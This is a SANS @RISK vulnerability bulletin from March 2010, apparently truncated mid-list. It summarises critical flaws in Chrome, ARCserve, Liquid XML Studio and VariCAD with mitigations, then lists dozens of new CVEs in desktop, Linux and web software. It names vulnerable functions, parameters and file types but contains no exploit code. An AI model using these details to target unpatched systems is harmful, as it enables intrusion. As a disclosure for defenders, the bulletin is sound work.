Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: IX, Issue: 13
March 25, 2010

SANS Newsletters Home

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Summary of Updates and Vulnerabilities in this Consensus
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Third Party Windows Apps
    • 8
    • Linux
    • 4
    • Cross Platform
    • 31 (#1, #2, #3, #4, #5, #6)
    • Web Application - Cross Site Scripting 13
    • Web Application - SQL Injection 29
    • Web Application
    • 33

************************* Sponsored By SANS *********************

What are the best practices in grid security? What are the most critical vulnerabilities in power systems and other elements of the critical infrastructure? Hear about these important findings at the 2010 SCADA & Process Control Summit. Also register for Pre and Post Summit courses including no-cost training sponsored by DHS on March 31. SANS Process Control and SCADA Summit March 29-30 - Orlando.

http://www.sans.org/info/57264

******************************************************************

TRAINING UPDATE

- -- SANS Northern Virginia Bootcamp 2010, April 6-13 Bonus evening presentations include Safe Surfing: How to Surf the Net Without Getting PWND

http://www.sans.org/reston-2010/

- -- SANS Security West 2010, San Diego, May 7-15, 2010

23 courses. Bonus evening presentations include Killer Bee: Exploiting ZigBee and the Kinetic World

http://www.sans.org/security-west-2010/

- -- SANSFIRE 2010, Baltimore, June 6-14, 2010 38 courses. Bonus evening presentations include Software Security Street Fighting Style and The Verizon Data Breach Investigations Report

http://www.sans.org/sansfire-2010/

- -- SANSFIRE Rocky Mountain 2010, Denver, July 12-17, 2010 8 courses. Bonus evening presentations include Hiding in Plain Sight: Forensic techniques to Counter the Advanced Persistent Threat

http://www.sans.org/rocky-mountain-2010/

- -- SANS Boston 2010, June 6-14, 2010 11 courses

http://www.sans.org/boston-2010/

Looking for training in your own community? http://sans.org/community/

Save on On-Demand training (30 full courses) - See samples at http://www.sans.org/ondemand/spring09.php

Plus Dubai, Geneva, Toronto, Singapore and Amsterdam all in the next 90 days.

For a list of all upcoming events, on-line and live: http://www.sans.org/index.php

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Linux
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Google Chrome Multiple Vulnerabilities
  • Affected:
    • Google Chrome 4.0.249 .89
    • Google Chrome 4.0.249 .78

  • Description: Google Chrome, a web browser developed by Google, is the fourth most popular web browser with 2.59% usage share among all the web browsers. Multiple vulnerabilities have been identified in Google Chrome, which can be used attackers to bypass security restrictions, compromise a vulnerable system. The first issue is a race condition and pointer error in the sandbox. The second issue can be used to delete persisted metadata. The third issue is caused by a memory error in the way the application handles specially crafted SVG files. The fourth issue is caused by integer overflow errors while handling WebKit JavaScript objects. The fifth issue is caused by spoofing of HTTP AUTH dialog with the help of long sub domains. The sixth issue if exploited correctly might lead to bypass of download warning dialog. The last issue is caused by an unspecified error and it might lead to bypass of cross-origin policy. Full technical details publicly available via source code analysis.

  • Status: Vendor confirmed, updates available.

  • References:
  • (4) MODERATE: Computer Associates ARCserve Backup JRE Multiple Vulnerabilities
  • Affected:
    • Computer Associates ARCserve Backup 12.5
    • Computer Associates ARCserve Backup 12.0
    • Computer Associates ARCserve Backup 11.5

  • Description: Computer Associates ARCserve Backup is a popular enterprise backup solution that provides data deduplication and resource management reporting. Multiple vulnerabilities have been reported in Computer Associates ARCserve Backup. These issues are caused by unspecified errors in the version of JRE that is shipped with ARC serve Backup. Apparently this version of JRE has also reached end of life. No further technical details for the vulnerabilities are available in the public.

  • Status: Vendor confirmed, updates available.

  • References:
  • (5) MODERATE: Liquid XML Studio ActiveX Buffer Overflow Vulnerability
  • Affected:
    • Liquid XML Studio 2010 versions 8.061970 and prior

  • Description: Liquid XML Studio, a product of Liquid Technologies, is a graphical XML Schema editor for windows and is used by many users around the globe especially popular in schools and universities. A buffer overflow vulnerability has been reported in a ActiveX control used by the Liquid XML Studio 2010 and a specially crafted web page that instantiates this ActiveX control can be used to trigger this vulnerability. The specific flaw is a boundary error in the " LtXmlComHelp8.dll" module and an attacker can exploit this vulnerability by sending an overly long argument to the "OpenFile()" method. Successful exploitation might allow an attacker to execute arbitrary code in the context of the affected application. Full technical details for the vulnerability are publicly available.

  • Status: Vendor not confirmed, no updates available. Users can mitigate the impact of this vulnerability by disabling the vulnerable control via Microsoft's kill bit mechanisms for CLSID {E68E401C-7DB0-4F3A-88E1-159882468A79}. Note that this may affect normal application functionality.

  • References:
  • (6) MODERATE: VariCAD Products Buffer Overflow Vulnerability
  • Affected:
    • VariCAD version 2.05 and prior
    • VariCAD Viewer version 2.05 and prior

  • Description: VariCAD is a Computer-aided design (CAD) program with features of 3D modeling and 2D drafting. A buffer overflow vulnerability has been reported in VariCAD and VariCAD viewer and a specially crafted DWB file can be used to trigger this vulnerability. The issue is caused by a boundary error in the way the affected application processes DWB files. Successful exploitation might allow an attacker to execute arbitrary code in the context of the affected application. Full technical details for the vulnerability are publicly available via proof-of-concept.

  • Status: Vendor not confirmed, no updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 13, 2010

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com) Week 13, 2010 This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 8386 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely. ______________________________________________________________________

  • 10.13.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Miranda IM "Use TLS" Configuration Option Security Bypass
  • Description: Miranda IM is an open source instant messenger for Windows. The application is exposed to a security bypass issue because it fails to properly implement an expected security feature. Miranda IM version 0.8.16 is affected.
  • Ref: http://code.google.com/p/miranda/issues/detail?id=152
  • 10.13.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Microsoft Windows Media Player AVI File Colorspace Conversion Remote Memory Corruption
  • Description: Microsoft Windows Media Player is a multimedia application available for the Windows operating system. The application is exposed to a remote memory corruption issue when handling crafted AVI files. Specifically, the "quartz.dll" library fails to handle color space conversions between bitmap data. Windows Media Player version 11 is affected.
  • Ref: http://www.securityfocus.com/bid/38790
  • 10.13.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: myMP3-Player ".m3u" File Buffer Overflow
  • Description: myMP3-Player is a multimedia player available for Microsoft Windows. The application is exposed to a buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, this issue occurs when opening a specially crafted ".m3u" file. myMP3-Player version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38835
  • 10.13.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ZippHo ".zip" File Stack-Based Buffer Overflow Vulnerability
  • Description: ZippHo is a file archiving application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when the application processes a specially crafted ".zip" file. ZippHo version 3.0.6 is affected.
  • Ref: http://www.securityfocus.com/bid/38836
  • 10.13.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Xilisoft Video Converter Wizard ".yuv" File Stack Buffer Overflow
  • Description: Xilisoft Video Converter is a media file converter for Microsoft Windows. Xilisoft Video Converter Wizard is exposed to a stack-based buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue occurs when parsing a specially crafted ".yuv" file.
  • Ref: http://www.securityfocus.com/bid/38854
  • 10.13.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Ken Ward's Zipper "filename" Stack-Based Buffer Overflow
  • Description: Ken Ward's Zipper is a file-archiving application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when the application processes a ".zip" archive that contains a file with a specially crafted filename. Ken Ward's Zipper version 4.60.019 is affected.
  • Ref: http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typ
    ical-seh-exploit/
  • 10.13.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: freeSSHd SSH2 Connection Data Remote Buffer Overflow
  • Description: freeSSHd is an SSH server for Microsoft Windows. freeSSHd is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when handling crafted SSH2 connection data. freeSSHd version 1.2.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38887
  • 10.13.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Donar Player ".wma" File Denial of Service
  • Description: Donar Player is a multimedia application available for the Windows operating system. The application is exposed to a denial of service issue when processing ".wma" files containing an excessively long string. Donar Player version 2.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38902
  • 10.13.9 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel DRBD kernel module Security Bypass
  • Description: The Linux kernel is exposed to a security bypass issue that affects the DRBD kernel module and allows local attackers to bypass "CAP_SYS_ADMIN" access restrictions and send netlink packets. Linux kernel versions 2.6.x are affected.
  • Ref: http://www.debian.org/security/2010/dsa-2015
  • 10.13.10 - CVE: CVE-2010-0008
  • Platform: Linux
  • Title: Linux Kernel "sctp_rcv_ootb()" Remote Denial of Service
  • Description: The Linux kernel is exposed to a remote denial of service issue because it fails to properly handle user-supplied input. This issue occurs because of inadequate checks in the "sctp_rcv_ootb()" function. Linux kernel versions prior to 2.6.23 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-0008
  • 10.13.11 - CVE: CVE-2009-4271
  • Platform: Linux
  • Title: Linux Kernel Virtual Dynamically-linked Shared Object Access Local Denial of Service
  • Description: The Linux kernel is exposed to a local denial of service issue. Specifically, a 32bit user process can cause the kernel to crash by accessing a VDSO (Virtual Dynamically-linked Shared Object) page after restricting access via a "mprotect()" call. The Linux kernels versions 2.6.9 through 2.6.17 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4271
  • 10.13.12 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel Bluetooth Sysfs File Local Privilege Escalation
  • Description: The Linux kernel is exposed to a privilege escalation issue affecting sysfs files associated with Bluetooth sockets. Specifically, opening a large number of Bluetooth sockets may result in data being written to unintended memory pages. Linux kernel versions prior to 2.6.34-rc2-git1 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=576018
  • 10.13.13 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BarnOwl "owl_message_get_cc_without_recipient()" Heap Buffer Overflow
  • Description: BarnOwl is an instant messaging client. BarnOwl is exposed to a heap-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs in the "owl_message_get_cc_without_recipient()" function when handling a specially crafted "CC:" string. BarnOwl versions prior to 1.5.1 are affected.
  • Ref: http://barnowl.mit.edu/wiki/barnowl-1.5.1-announce
  • 10.13.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Transmission Magnet Link Remote Buffer Overflow
  • Description: Transmission is a multiplatform BitTorrent client. Transmission is exposed to a remote stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when handling a specially crafted magnet link. Transmission versions prior to 1.9.2 are affected.
  • Ref: http://trac.transmissionbt.com/wiki/Changes
  • 10.13.15 - CVE: Not Available
  • Platform: Cross Platform
  • Title: VariCAD 2010 "DWB" File Remote Buffer Overflow
  • Description: VariCAD 2010 and VariCAD Viewer are CAD applications available for Microsoft Windows and Linux. The applications are exposed to a remote buffer overflow issue because they fail to perform adequate checks on user-supplied input. VariCAD version 2010 2.05 and VariCAD Viewer are affected.
  • Ref: http://www.securityfocus.com/bid/38815
  • 10.13.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Embedthis Appweb "waitCallback()" Remote Denial of Service
  • Description: Appweb is an embedded HTTP server application. The server is exposed to a denial of service issue when handling certain requests. Specifically, the "waitCallback()" function in src/mpr/mprLib.c is affected when multiple malformed requests are sent to the server. Appweb version 3.1.2 is affected.
  • Ref: http://hg.embedthis.com/appweb/log/1720
  • 10.13.17 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Google Chrome prior to 4.1.249.1036 Multiple Security Vulnerabilities
  • Description: Google Chrome is a web browser for multiple platforms. The browser is exposed to multiple issues. Attackers can exploit these issues to obtain sensitive information, execute arbitrary code in the context of the browser, bypass certain security restrictions and carry out other attacks. Chrome versions prior to 4.1.249.1036 are affected.
  • Ref: http://googlechromereleases.blogspot.com/2010/03/stable-channel-update.html
  • 10.13.18 - CVE: CVE-2009-3385
  • Platform: Cross Platform
  • Title: Mozilla SeaMonkey Scriptable Plugin Content Security Bypass
  • Description: Mozilla SeaMonkey is a suite of applications that includes a browser and an email client. Mozilla SeaMonkey is exposed to a security bypass issue because it allows load and execute of scriptable plugin content, such as a Flash object, by embedding it in an "iframe" tag inside a message. Mozilla SeaMonkey versions prior to 1.1.19 are affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-06.html
  • 10.13.19 - CVE: CVE-2010-0161, CVE-2010-0163
  • Platform: Cross Platform
  • Title: Mozilla Thunderbird Multiple Denial of Service Vulnerabilities
  • Description: Mozilla Thunderbird is an email client; SeaMonkey is a suite of applications that includes a browser and an email client. Mozilla Thunderbird is exposed to multiple denial of service issues. Mozilla Thunderbird versions 2.0.0.23 and earlier are affected. SeaMonkey versions prior to 1.1.19 are affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-07.html
  • 10.13.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Content Manager Web Services Unspecified
  • Description: IBM DB2 is a database application available for multiple platforms. The application is exposed to an unspecified issue that affects the single sign on component of Content Manager Web services. IBM DB2 versions prior to 8.3 Fix Pack 13 are affected.
  • Ref: http://www-01.ibm.com/support/docview.wss?uid=swg27018205
  • 10.13.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: MPlayer WAV File Remote Null Pointer Dereference
  • Description: MPlayer is a media player application available for multiple platforms. MPlayer is exposed to a remote NULL pointer dereference issue because the application fails to perform adequate boundary checks on user-supplied input. MPlayer version 1.0rc3 is affected.
  • Ref: http://www.securityfocus.com/bid/38837
  • 10.13.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Citrix Web Interface Source Code Information Disclosure
  • Description: Citrix Web Interface is an application deployment system that provides users with access to Presentation Server applications through a standard browser. Citrix Web Interface is exposed to an issue that lets attackers access certain source code found in the "ClientScript" folder. Citrix Web Interface version 4.5.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38838
  • 10.13.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Computer Associates ARCserve Backup JRE Multiple Remote Vulnerabilities
  • Description: Computer Associates ARCserve Backup products provide backup and restore protection. Computer Associates ARCserve Backup is exposed to multiple unspecified issues that exist in the Java Runtime Environment included with the application.
  • Ref: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=231977
  • 10.13.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: eDisplay Personal FTP Server "USER" Command Remote Memory Corruption
  • Description: eDisplay Personal FTP Server is an FTP server application. The application is exposed to a remote memory corruption issue because the application fails to perform adequate boundary checks on user-supplied input. Specifically the issue occurs when processing a specially crafted "USER" command. eDisplay Personal FTP Server version 1.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38855
  • 10.13.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: eDisplay Personal FTP server Multiple Commands Remote Buffer Overflow Vulnerabilities
  • Description: eDisplay Personal FTP server is an FTP server for Microsoft Windows. The server is exposed to multiple remote buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. eDisplay Personal FTP server version 1.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38860
  • 10.13.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: KDE KSysguard ".sgrd" File Processing Arbitrary Command Execution
  • Description: KDE (K Desktop Environment) is a desktop for Unix variants. KDE is exposed to an arbitrary command injection issue because the KSysguard application fails to properly handle malicious ".sgrd" files. KDE versions 4.4.1 and earlier are affected.
  • Ref: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
  • 10.13.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WordPress Password Protection Security Bypass
  • Description: WordPress is a web-based publishing application. The application is exposed to a security bypass issue because it fails to properly restrict access to certain content. Specifically, individual posts and pages may be password-protected. WordPress versions 2.9.2 and 2.0.11 are affected.
  • Ref: http://seclists.org/fulldisclosure/2010/Mar/361
  • 10.13.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Apple Safari Nested "object" Tag Remote Denial of Service
  • Description: Apple Safari is a web browser. Apple Safari is exposed to a remote denial of service issue. Specifically, the application may crash when processing a HTML document containing an excessive number of nested "object" tags. Safari version 4.0.5 for Windows is affected.
  • Ref: http://www.securityfocus.com/bid/38884
  • 10.13.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser XSLT Cross-Domain Information Disclosure
  • Description: Opera Web Browser is a browser that runs on multiple operating systems. The application is exposed to an information disclosure issue. Specifically, when the browser processes certain XSLT constructs it may disclose contents of the cached versions of any Web page that was previously visited. Opera Web Browser version 10.50 is affected.
  • Ref: http://www.opera.com/support/kb/view/949/
  • 10.13.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GraphicsMagick File Handling Remote Integer Underflow
  • Description: GraphicsMagick is an image processing application available for multiple platforms. GraphicsMagick is exposed to a remote integer underflow issue because it fails to sufficiently validate an integer value. The issue occurs when the application handles certain unspecified file formats of characters in file names. GraphicsMagick versions prior to 1.3.11 are affected.
  • Ref: http://sourceforge.net/mailarchive/message.php?msg_name=alpine.GSO.2.01.10022116
    22420.25017@freddy.simplesystems.org
  • 10.13.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cafu Multiple Remote Vulnerabilities
  • Description: Cafu is a 3D environment engine for Linux and Windows. The server application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input. Specifically, the server can be crashed when sending an incomplete "CS0_RemoteConsoleCommand" packet that doesn't contain the "password" field, leading to a NULL pointer access. Cafu versions 9.06 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/38897
  • 10.13.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Crimson Editor ".cfg" File Stack Buffer Overflow
  • Description: Crimson Editor is a text editor application. Crimson Editor is exposed to a stack-based buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue occurs when parsing a specially crafted ".cfg" file. Crimson Editor version 3.70 is affected.
  • Ref: http://www.securityfocus.com/bid/38900
  • 10.13.34 - CVE: CVE-2010-0619
  • Platform: Cross Platform
  • Title: Multiple Lexmark Laser Printers PJL Processing Remote Stack Buffer Overflow
  • Description: Lexmark manufactures multiple laser printer models. Multiple Lexmark laser printer models are exposed to a remote stack-based buffer overflow issue because they fail to perform adequate boundary checks on user-supplied data. This issue occurs when a device processes a specially crafted Printer Job Language (PJL) request that contains an invalid argument to the "PJL INQUIRE" command.
  • Ref: http://support.lexmark.com/index?page=content&id=TE84&locale=EN&user
    locale=EN_US
  • 10.13.35 - CVE: CVE-2010-0628
  • Platform: Cross Platform
  • Title: MIT Kerberos "gss_accept_sec_context()" Denial Of Service
  • Description: MIT Kerberos is a suite of applications and libraries designed to implement the Kerberos network authentication protocol. MIT Kerberos is exposed to a remote denial of service issue that affects the "spnego_gss_accept_sec_context()" function of the "src/lib/gssapi/spnego/spnego_mech.c" source file when processing an invalid packet during the beginning of the GSS-API protocol exchange. MIT Kerberos versions prior to 1.7.2 and 1.8.1 are affected.
  • Ref: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-002.txt
  • 10.13.36 - CVE: CVE-2010-0618
  • Platform: Cross Platform
  • Title: Multiple Lexmark Laser Printers FTP Service Remote Denial of Service
  • Description: Lexmark manufactures multiple laser printer models. Multiple Lexmark laser printers are exposed to a remote denial of service issue because they fail to properly implement flood protection to the FTP service.
  • Ref: http://support.lexmark.com/index?page=content&id=TE85&locale=EN&user
    locale=EN_US
  • 10.13.37 - CVE: CVE-2009-2907
  • Platform: Cross Platform
  • Title: Multiple SpringSource Products Multiple HTML Injection Vulnerabilities
  • Description: SpringSource Hyperic HQ, tc Server, and Application Management Suite are infrastructure management applications. The applications are exposed to multiple HTML injection issues because they fail to sufficiently sanitize user-supplied input to the "description" field of unspecified scripts; additional, unspecified scripts and parameters are also vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/510293
  • 10.13.38 - CVE: CVE-2010-0172, CVE-2010-0169, CVE-2010-0168,CVE-2010-0171, CVE-2010-0167, CVE-2010-0166, CVE-2010-0165,CVE-2010-0170, CVE-2010-0164
  • Platform: Cross Platform
  • Title: Mozilla Firefox Thunderbird and SeaMonkey MFSA 2010-09 through - -15 Multiple Vulnerabilities
  • Description: The Mozilla Foundation has released multiple advisories to address vulnerabilities in Firefox, Thunderbird and SeaMonkey. Attackers may use these vulnerabilities to crash the browser, execute arbitrary code, retrieve potentially sensitive information, bypass certain security restrictions, gain unauthorized access to resources and carry out cross-site scripting and cross-domain scripting attacks.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-09.html
  • 10.13.39 - CVE: CVE-2010-0170
  • Platform: Cross Platform
  • Title: Mozilla Firefox "window.location" Same Origin Policy Security Bypass
  • Description: Mozilla Firefox is a web browser available for multiple platforms. A security bypass issue exists because the "window.location" object is an overridable JavaScript object. This may allow attackers to create a malicious website that would override the object and bypass certain security restrictions of plugins that use this object to determine the page origin and enforce access restrictions. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-10.html
  • 10.13.40 - CVE: CVE-2010-0172
  • Platform: Cross Platform
  • Title: Mozilla Firefox Asynchronous HTTP Authorization Prompt Information Disclosure
  • Description: Mozilla Firefox is a web browser available for multiple platforms. Mozilla Firefox is exposed to an information disclosure issue Specifically, this issue arises because the application does not attach an asynchronous HTTP authorization prompt to the correct browser window or tab. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-15.html
  • 10.13.41 - CVE: CVE-2010-0164
  • Platform: Cross Platform
  • Title: Mozilla Firefox "multipart/x-mixed-replace" Image Remote Memory Corruption
  • Description: Mozilla Firefox is a browser available for various platforms. The application is exposed to a remote memory corruption issue that occurs due to a use-after-free error in the libpr0n library. Specifically, a specially crafted animation with bits-per-pixel changes, received via the "multipart/x-mixed-replace" mime may cause the browser to free and then reuse a memory pointer. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-09.html
  • 10.13.42 - CVE: CVE-2010-0169
  • Platform: Cross Platform
  • Title: Mozilla Firefox Cached XUL Stylesheets Security Bypass
  • Description: Mozilla Firefox is a web browser available for multiple platforms. Mozilla Firefox is exposed to an issue that may allow attackers to modify browser settings. Specifically, this issue arises because stylesheets from remote XUL documents can be placed in the XUL cache.
  • Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=535806
  • 10.13.43 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Serv-U Multiple Security Vulnerabilities
  • Description: Serv-U is a file server. Serv-U is exposed to multiple security issues. Attackers can exploit this issue to bypass certain security restrictions or crash the affected application. Serv-U versions prior to 9.4.0.0 are affected.
  • Ref: http://www.serv-u.com/releasenotes/
  • 10.13.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Sellector.com Widget Integration Extension Unspecified Cross-Site Scripting
  • Description: Sellector.com Widget Integration ('chsellector') is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Sellector.com Widget Integration versions 0.1.1 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Quixplorer Extension Unspecified Cross-Site Scripting
  • Description: Quixplorer (t3quixplorer) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Quixplorer versions 1.7.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 myDashboard (mydashboard) Extension Unspecified Cross-Site Scripting
  • Description: myDashboard is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. myDashboard versions 0.1.13 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 UserTask Center, Recent Extension Unspecified Cross-Site Scripting
  • Description: UserTask Center, recent (taskcenter_recent) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. UserTask Center, recent version 0.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Reports Logfile View Extension Unspecified Cross-Site Scripting
  • Description: Reports Logfile View ('reports_logview') is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Reports Logfile View version 1.2.1 is affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.49 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 mm_forum Extension Unspecified Cross-Site Scripting
  • Description: mm_forum is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. mm_forum versions 1.8.2 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-007/
  • 10.13.50 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DotNetNuke Search Function Cross-Site Scripting
  • Description: DotNetNuke is an open source framework for creating and deploying websites. The application is exposed to a cross-site scripting issue because it fails to properly sanitize unspecified user-supplied input to the search function. DotNetNuke versions 5.0.0 through 5.2.3 are affected.
  • Ref: http://www.dotnetnuke.com/News/SecurityPolicy/securitybulletinno33/tabid/1522/De
    fault.aspx
  • 10.13.51 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: PHPWind Multiple Cross-Site Scripting Vulnerabilities
  • Description: PHPWind is a web-based bulletin board application implemented in PHP. The application is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input in many different parameters. PHPWind 6.0 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/38867
  • 10.13.52 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: WebMatic Multiple Cross-Site Scripting Vulnerabilities
  • Description: Valarsoft WebMatic is an application that allows users to develop websites. It is exposed to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input. WebMatic versions 3.0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38874/info
  • 10.13.53 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: IBM Lotus Notes "names.nsf" Cross Site Scripting
  • Description: IBM Lotus Notes is a groupware application. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "names.nsf" script. Lotus Notes versions 6.x are affected.
  • Ref: http://www.securityfocus.com/bid/38880
  • 10.13.54 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpCAS Cross-Site Scripting
  • Description: phpCAS is an implementation of CAS (Central Authentication Service) to provide single sign-on services for web-based applications. phpCAS is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input. phpCAS version 1.1.0 is affected.
  • Ref: http://www.ja-sig.org/issues/browse/PHPCAS-52
  • 10.13.55 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Astaro Security Linux "index.fpl" Cross-Site Scripting
  • Description: Astaro Security Linux is a network security solution offering a firewall, VPN, antivirus, and intrusion detection. Astaro Security Linux is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input. Astaro Security Linux version 5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/510273
  • 10.13.56 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: agXchange ESM "ucquerydetails.jsp" Cross-Site Scripting
  • Description: agXchange ESM is an electronic safety report communication application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "QueryID" parameter of the "ucquerydetails.jsp" script.
  • Ref: http://www.securityfocus.com/archive/1/510247
  • 10.13.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 CleanDB - DBAL (tmsw_cleandb) Unspecified SQL Injection
